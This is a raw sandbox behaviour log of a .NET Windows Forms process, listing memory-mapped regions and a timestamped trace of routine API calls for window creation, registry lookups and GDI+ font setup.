end_va = 0x7993fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 538
start_va = 0xa730000
end_va = 0xa774fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db")
Region:
id = 539
start_va = 0xa780000
end_va = 0xa783fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 540
start_va = 0xa790000
end_va = 0xa81dfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 541
start_va = 0xa820000
end_va = 0xa830fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui")
Region:
id = 542
start_va = 0xa840000
end_va = 0xa87ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a840000"
filename = ""
Region:
id = 543
start_va = 0xa880000
end_va = 0xa97ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a880000"
filename = ""
Region:
id = 544
start_va = 0x717a0000
end_va = 0x7191dfff
monitored = 0
entry_point = 0x7181c630
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 545
start_va = 0x73b80000
end_va = 0x73e4afff
monitored = 0
entry_point = 0x73dbc4c0
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 546
start_va = 0xa980000
end_va = 0xa980fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000000a980000"
filename = ""
Region:
id = 624
start_va = 0xa330000
end_va = 0xa33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a330000"
filename = ""
Region:
id = 1199
start_va = 0xa340000
end_va = 0xa34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a340000"
filename = ""
Region:
id = 1200
start_va = 0xa350000
end_va = 0xa35ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a350000"
filename = ""
Region:
id = 1201
start_va = 0xa360000
end_va = 0xa36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a360000"
filename = ""
Region:
id = 1202
start_va = 0xa410000
end_va = 0xa41ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a410000"
filename = ""
Region:
id = 1203
start_va = 0xa420000
end_va = 0xa42ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a420000"
filename = ""
Region:
id = 1204
start_va = 0xa430000
end_va = 0xa43ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a430000"
filename = ""
Region:
id = 1205
start_va = 0xa440000
end_va = 0xa44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a440000"
filename = ""
Region:
id = 1206
start_va = 0xa450000
end_va = 0xa45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a450000"
filename = ""
Region:
id = 1207
start_va = 0xa460000
end_va = 0xa46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a460000"
filename = ""
Region:
id = 1208
start_va = 0xa470000
end_va = 0xa47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a470000"
filename = ""
Region:
id = 1209
start_va = 0xa480000
end_va = 0xa48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a480000"
filename = ""
Region:
id = 1210
start_va = 0xa490000
end_va = 0xa49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a490000"
filename = ""
Region:
id = 1211
start_va = 0xa4a0000
end_va = 0xa4affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a4a0000"
filename = ""
Region:
id = 1212
start_va = 0xa4b0000
end_va = 0xa4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a4b0000"
filename = ""
Region:
id = 1213
start_va = 0xa4c0000
end_va = 0xa4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a4c0000"
filename = ""
Region:
id = 1214
start_va = 0xa4d0000
end_va = 0xa4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a4d0000"
filename = ""
Region:
id = 1215
start_va = 0xa4e0000
end_va = 0xa4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a4e0000"
filename = ""
Region:
id = 1216
start_va = 0xa340000
end_va = 0xa34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a340000"
filename = ""
Region:
id = 1217
start_va = 0xa350000
end_va = 0xa36ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000000a350000"
filename = ""
Region:
id = 1218
start_va = 0xa410000
end_va = 0xa41ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a410000"
filename = ""
Region:
id = 1219
start_va = 0xa410000
end_va = 0xa41ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a410000"
filename = ""
Region:
id = 1220
start_va = 0xa420000
end_va = 0xa42ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a420000"
filename = ""
Region:
id = 1221
start_va = 0xa430000
end_va = 0xa43ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a430000"
filename = ""
Region:
id = 1222
start_va = 0xa440000
end_va = 0xa44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a440000"
filename = ""
Region:
id = 1268
start_va = 0xa410000
end_va = 0xa44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a410000"
filename = ""
Region:
id = 1269
start_va = 0xa990000
end_va = 0xaa8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a990000"
filename = ""
Thread:
id = 1
os_tid = 0x1398
[0088.699] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0089.663] RoInitialize () returned 0x1
[0089.664] RoUninitialize () returned 0x0
[0097.185] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x19de58 | out: phkResult=0x19de58*=0x0) returned 0x2
[0097.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x19eed4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77
[0097.216] IsAppThemed () returned 0x1
[0097.221] CoTaskMemAlloc (cb=0xf0) returned 0x6e3790
[0097.222] CreateActCtxA (pActCtx=0x19f418) returned 0x6fbef4
[0097.355] CoTaskMemFree (pv=0x6e3790)
[0097.369] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1e2
[0097.369] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1e1
[0097.430] GetSystemMetrics (nIndex=75) returned 1
[0097.438] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0098.931] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6ed50000
[0099.011] AdjustWindowRectEx (in: lpRect=0x19f458, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x19f458) returned 1
[0099.013] GetCurrentProcess () returned 0xffffffff
[0099.014] GetCurrentThread () returned 0xfffffffe
[0099.014] GetCurrentProcess () returned 0xffffffff
[0099.014] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19f370, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19f370*=0x298) returned 1
[0099.017] GetCurrentThreadId () returned 0x1398
[0099.034] GetCurrentActCtx (in: lphActCtx=0x19f2d0 | out: lphActCtx=0x19f2d0*=0x0) returned 1
[0099.035] ActivateActCtx (in: hActCtx=0x6fbef4, lpCookie=0x19f2e0 | out: hActCtx=0x6fbef4, lpCookie=0x19f2e0) returned 1
[0099.035] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0100.300] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x72dd0000
[0100.321] GetModuleHandleW (lpModuleName="user32.dll") returned 0x743d0000
[0100.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x19f194, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWÀiwèÒ'(ú", lpUsedDefaultChar=0x0) returned 14
[0100.322] GetProcAddress (hModule=0x743d0000, lpProcName="DefWindowProcW") returned 0x73e807e0
[0100.323] GetStockObject (i=5) returned 0x1900015
[0100.327] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0100.335] CoTaskMemAlloc (cb=0x5c) returned 0x6fa0e0
[0100.335] RegisterClassW (lpWndClass=0x19f184) returned 0xc1dd
[0100.336] CoTaskMemFree (pv=0x6fa0e0)
[0100.336] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0100.337] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r10_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x3037c
[0100.340] SetWindowLongW (hWnd=0x3037c, nIndex=-4, dwNewLong=1944586208) returned 78054846
[0100.341] GetWindowLongW (hWnd=0x3037c, nIndex=-4) returned 1944586208
[0100.342] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e9e4 | out: phkResult=0x19e9e4*=0x2b4) returned 0x0
[0100.343] RegQueryValueExW (in: hKey=0x2b4, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x19ea04, lpData=0x0, lpcbData=0x19ea00*=0x0 | out: lpType=0x19ea04*=0x0, lpData=0x0, lpcbData=0x19ea00*=0x0) returned 0x2
[0100.343] RegQueryValueExW (in: hKey=0x2b4, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x19ea04, lpData=0x0, lpcbData=0x19ea00*=0x0 | out: lpType=0x19ea04*=0x0, lpData=0x0, lpcbData=0x19ea00*=0x0) returned 0x2
[0100.343] RegCloseKey (hKey=0x2b4) returned 0x0
[0100.345] SetWindowLongW (hWnd=0x3037c, nIndex=-4, dwNewLong=78054886) returned 1944586208
[0100.346] GetWindowLongW (hWnd=0x3037c, nIndex=-4) returned 78054886
[0100.346] GetWindowLongW (hWnd=0x3037c, nIndex=-16) returned 113311744
[0100.347] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc14b
[0100.347] CallWindowProcW (lpPrevWndFunc=0x73e807e0, hWnd=0x3037c, Msg=0x24, wParam=0x0, lParam=0x19ecfc) returned 0x0
[0100.347] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1db
[0100.348] CallWindowProcW (lpPrevWndFunc=0x73e807e0, hWnd=0x3037c, Msg=0x81, wParam=0x0, lParam=0x19ecf0) returned 0x1
[0100.349] CallWindowProcW (lpPrevWndFunc=0x73e807e0, hWnd=0x3037c, Msg=0x83, wParam=0x0, lParam=0x19ecdc) returned 0x0
[0100.694] CallWindowProcW (lpPrevWndFunc=0x73e807e0, hWnd=0x3037c, Msg=0x1, wParam=0x0, lParam=0x19ecf0) returned 0x0
[0100.694] GetClientRect (in: hWnd=0x3037c, lpRect=0x19ea1c | out: lpRect=0x19ea1c) returned 1
[0100.694] GetWindowRect (in: hWnd=0x3037c, lpRect=0x19ea1c | out: lpRect=0x19ea1c) returned 1
[0100.697] GetParent (hWnd=0x3037c) returned 0x0
[0100.697] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10b00001) returned 1
[0100.932] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0100.932] AdjustWindowRectEx (in: lpRect=0x19f208, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19f208) returned 1
[0100.934] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0100.934] AdjustWindowRectEx (in: lpRect=0x19f218, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f218) returned 1
[0100.935] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0100.935] AdjustWindowRectEx (in: lpRect=0x19f218, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f218) returned 1
[0100.935] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0100.935] AdjustWindowRectEx (in: lpRect=0x19f218, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f218) returned 1
[0100.935] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0100.935] AdjustWindowRectEx (in: lpRect=0x19f218, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f218) returned 1
[0100.935] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0100.936] AdjustWindowRectEx (in: lpRect=0x19f218, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f218) returned 1
[0100.936] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0100.936] AdjustWindowRectEx (in: lpRect=0x19f208, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19f208) returned 1
[0100.937] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0100.938] AdjustWindowRectEx (in: lpRect=0x19f21c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f21c) returned 1
[0100.939] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0100.939] AdjustWindowRectEx (in: lpRect=0x19f21c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f21c) returned 1
[0100.939] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0100.939] AdjustWindowRectEx (in: lpRect=0x19f208, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19f208) returned 1
[0100.946] GetCurrentThreadId () returned 0x1398
[0100.946] GetCurrentThreadId () returned 0x1398
[0100.952] GetSystemDefaultLCID () returned 0x409
[0100.952] GetStockObject (i=17) returned 0x10a0047
[0100.955] GetObjectW (in: h=0x10a0047, c=92, pv=0x19f06c | out: pv=0x19f06c) returned 92
[0100.956] GetDC (hWnd=0x0) returned 0xa0100d0
[0101.798] GdiplusStartup (in: token=0x619138, input=0x19e628, output=0x19e678 | out: token=0x619138, output=0x19e678) returned 0x0
[0101.808] CoTaskMemAlloc (cb=0x5c) returned 0x6fa4f0
[0101.810] GdipCreateFontFromLogfontW (hdc=0xa0100d0, logfont=0x6fa4f0, font=0x19f134) returned 0x0
[0103.630] CoTaskMemFree (pv=0x6fa4f0)
[0103.631] CoTaskMemAlloc (cb=0x5c) returned 0x6fa1b0
[0103.631] CoTaskMemFree (pv=0x6fa1b0)
[0103.632] CoTaskMemAlloc (cb=0x5c) returned 0x6fa0e0
[0103.632] CoTaskMemFree (pv=0x6fa0e0)
[0103.632] GdipGetFontUnit (font=0x4c61f08, unit=0x19f100) returned 0x0
[0103.632] GdipGetFontSize (font=0x4c61f08, size=0x19f104) returned 0x0
[0103.633] GdipGetFontStyle (font=0x4c61f08, style=0x19f0fc) returned 0x0
[0103.633] GdipGetFamily (font=0x4c61f08, family=0x19f0f8) returned 0x0
[0103.634] GdipGetFontSize (font=0x4c61f08, size=0x233a388) returned 0x0
[0103.634] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0103.635] GetDC (hWnd=0x0) returned 0xc0100ae
[0103.635] GdipCreateFromHDC (hdc=0xc0100ae, graphics=0x19f11c) returned 0x0
[0103.648] GdipGetDpiY (graphics=0x5c7f268, dpi=0x233a490) returned 0x0
[0103.648] GdipGetFontHeight (font=0x4c61f08, graphics=0x5c7f268, height=0x19f114) returned 0x0
[0103.648] GdipGetEmHeight (family=0x5c74488, style=0, EmHeight=0x19f11c) returned 0x0
[0103.649] GdipGetLineSpacing (family=0x5c74488, style=0, LineSpacing=0x19f11c) returned 0x0
[0103.649] GdipDeleteGraphics (graphics=0x5c7f268) returned 0x0
[0103.670] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1
[0103.671] GdipCreateFont (fontFamily=0x5c74488, emSize=0x41040000, style=0, unit=0x3, font=0x233a450) returned 0x0
[0103.671] GdipGetFontSize (font=0x4c6efc0, size=0x233a454) returned 0x0
[0103.671] GdipDeleteFont (font=0x4c61f08) returned 0x0
[0103.673] GetCurrentThreadId () returned 0x1398
[0103.673] GetCurrentThreadId () returned 0x1398
[0103.673] GetCurrentThreadId () returned 0x1398
[0103.673] GetCurrentThreadId () returned 0x1398
[0103.673] GetCurrentThreadId () returned 0x1398
[0103.673] GetCurrentThreadId () returned 0x1398
[0103.673] GetCurrentThreadId () returned 0x1398
[0103.673] GetCurrentThreadId () returned 0x1398
[0103.674] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.675] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19f1a8) returned 1
[0103.713] GetProcessWindowStation () returned 0xf0
[0103.720] GetUserObjectInformationA (in: hObj=0xf0, nIndex=1, pvInfo=0x233ad2c, nLength=0xc, lpnLengthNeeded=0x19f084 | out: pvInfo=0x233ad2c, lpnLengthNeeded=0x19f084) returned 1
[0103.723] SetConsoleCtrlHandler (HandlerRoutine=0x4a7060e, Add=1) returned 1
[0103.724] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0103.725] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0103.726] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x233ad90 | out: lpWndClass=0x233ad90) returned 0
[0103.729] CoTaskMemAlloc (cb=0x58) returned 0x6fc420
[0103.729] RegisterClassW (lpWndClass=0x19efd4) returned 0xc1d9
[0103.729] CoTaskMemFree (pv=0x6fc420)
[0103.730] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x5033a
[0103.731] NtdllDefWindowProc_W (hWnd=0x5033a, Msg=0x81, wParam=0x0, lParam=0x19eb10) returned 0x1
[0103.737] NtdllDefWindowProc_W (hWnd=0x5033a, Msg=0x83, wParam=0x0, lParam=0x19eafc) returned 0x0
[0103.737] NtdllDefWindowProc_W (hWnd=0x5033a, Msg=0x1, wParam=0x0, lParam=0x19eb10) returned 0x0
[0103.738] NtdllDefWindowProc_W (hWnd=0x5033a, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0
[0103.738] NtdllDefWindowProc_W (hWnd=0x5033a, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0
[0103.748] GetSysColor (nIndex=10) returned 0xb4b4b4
[0103.748] GetSysColor (nIndex=2) returned 0xd1b499
[0103.748] GetSysColor (nIndex=9) returned 0x0
[0103.748] GetSysColor (nIndex=12) returned 0xababab
[0103.748] GetSysColor (nIndex=15) returned 0xf0f0f0
[0103.748] GetSysColor (nIndex=20) returned 0xffffff
[0103.748] GetSysColor (nIndex=16) returned 0xa0a0a0
[0103.748] GetSysColor (nIndex=15) returned 0xf0f0f0
[0103.748] GetSysColor (nIndex=16) returned 0xa0a0a0
[0103.748] GetSysColor (nIndex=21) returned 0x696969
[0103.748] GetSysColor (nIndex=22) returned 0xe3e3e3
[0103.748] GetSysColor (nIndex=20) returned 0xffffff
[0103.748] GetSysColor (nIndex=18) returned 0x0
[0103.748] GetSysColor (nIndex=1) returned 0x0
[0103.749] GetSysColor (nIndex=27) returned 0xead1b9
[0103.749] GetSysColor (nIndex=28) returned 0xf2e4d7
[0103.749] GetSysColor (nIndex=17) returned 0x6d6d6d
[0103.749] GetSysColor (nIndex=13) returned 0xff9933
[0103.749] GetSysColor (nIndex=14) returned 0xffffff
[0103.749] GetSysColor (nIndex=26) returned 0xcc6600
[0103.749] GetSysColor (nIndex=11) returned 0xfcf7f4
[0103.749] GetSysColor (nIndex=3) returned 0xdbcdbf
[0103.749] GetSysColor (nIndex=19) returned 0x0
[0103.749] GetSysColor (nIndex=24) returned 0xe1ffff
[0103.749] GetSysColor (nIndex=23) returned 0x0
[0103.749] GetSysColor (nIndex=4) returned 0xf0f0f0
[0103.749] GetSysColor (nIndex=30) returned 0xf0f0f0
[0103.749] GetSysColor (nIndex=29) returned 0xff9933
[0103.749] GetSysColor (nIndex=7) returned 0x0
[0103.749] GetSysColor (nIndex=0) returned 0xc8c8c8
[0103.749] GetSysColor (nIndex=5) returned 0xffffff
[0103.749] GetSysColor (nIndex=6) returned 0x646464
[0103.750] GetSysColor (nIndex=8) returned 0x0
[0103.750] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.750] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19f1a8) returned 1
[0103.753] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.753] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f1a8) returned 1
[0103.754] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.754] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f1a8) returned 1
[0103.760] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.760] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f1a8) returned 1
[0103.760] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.761] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f1a8) returned 1
[0103.761] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.761] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f1a8) returned 1
[0103.761] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.761] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f1a8) returned 1
[0103.761] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.761] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f1a8) returned 1
[0103.762] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.762] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f1a8) returned 1
[0103.762] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.762] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f1a8) returned 1
[0103.762] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.762] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f1a8) returned 1
[0103.762] GetCurrentThreadId () returned 0x1398
[0103.763] GetCurrentThreadId () returned 0x1398
[0103.763] GetCurrentThreadId () returned 0x1398
[0103.763] GetCurrentThreadId () returned 0x1398
[0103.763] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.763] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19f1a8) returned 1
[0103.763] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.763] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19f1a8) returned 1
[0103.771] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.771] AdjustWindowRectEx (in: lpRect=0x19f05c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f05c) returned 1
[0103.774] GdipGetFamilyName (in: family=0x5c74488, name=0x19f028, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0103.776] CreateCompatibleDC (hdc=0x0) returned 0x3701098e
[0103.777] GetCurrentObject (hdc=0x3701098e, type=0x1) returned 0x1b00017
[0103.777] GetCurrentObject (hdc=0x3701098e, type=0x2) returned 0x1900010
[0103.777] GetCurrentObject (hdc=0x3701098e, type=0x7) returned 0x185000f
[0103.777] GetCurrentObject (hdc=0x3701098e, type=0x6) returned 0x18a0048
[0103.778] SaveDC (hdc=0x3701098e) returned 1
[0103.778] GetDeviceCaps (hdc=0x3701098e, index=90) returned 96
[0103.781] CoTaskMemAlloc (cb=0x5c) returned 0x6fa5c0
[0103.781] CreateFontIndirectW (lplf=0x6fa5c0) returned 0x240a097a
[0103.781] CoTaskMemFree (pv=0x6fa5c0)
[0103.782] GetObjectW (in: h=0x240a097a, c=92, pv=0x19efec | out: pv=0x19efec) returned 92
[0103.786] GetCurrentObject (hdc=0x3701098e, type=0x6) returned 0x18a0048
[0103.786] GetObjectW (in: h=0x18a0048, c=92, pv=0x19efd4 | out: pv=0x19efd4) returned 92
[0103.786] SelectObject (hdc=0x3701098e, h=0x240a097a) returned 0x18a0048
[0103.788] GetTextExtentPoint32W (in: hdc=0x3701098e, lpString="0", c=1, psizl=0x233beec | out: psizl=0x233beec) returned 1
[0103.795] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.795] AdjustWindowRectEx (in: lpRect=0x19f130, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f130) returned 1
[0103.796] GdipCreateFontFamilyFromName (name="Arial", fontCollection=0x0, fontFamily=0x19f1f8) returned 0x0
[0103.797] GdipCreateFont (fontFamily=0x5c70880, emSize=0x417c0000, style=1, unit=0x3, font=0x233bfc8) returned 0x0
[0103.896] GdipGetFontSize (font=0x4c61f08, size=0x233bfcc) returned 0x0
[0103.896] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.897] AdjustWindowRectEx (in: lpRect=0x19f014, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f014) returned 1
[0103.897] GdipGetFamilyName (in: family=0x5c70880, name=0x19efe0, language=0x409 | out: name="Arial") returned 0x0
[0103.897] GetDeviceCaps (hdc=0x3701098e, index=90) returned 96
[0103.897] CoTaskMemAlloc (cb=0x5c) returned 0x6fa0e0
[0103.897] CreateFontIndirectW (lplf=0x6fa0e0) returned 0x300a096d
[0103.897] CoTaskMemFree (pv=0x6fa0e0)
[0103.897] GetObjectW (in: h=0x300a096d, c=92, pv=0x19efa4 | out: pv=0x19efa4) returned 92
[0103.897] SelectObject (hdc=0x3701098e, h=0x300a096d) returned 0x240a097a
[0103.900] DeleteObject (ho=0x240a097a) returned 1
[0103.900] GetTextExtentPoint32W (in: hdc=0x3701098e, lpString="0", c=1, psizl=0x233c27c | out: psizl=0x233c27c) returned 1
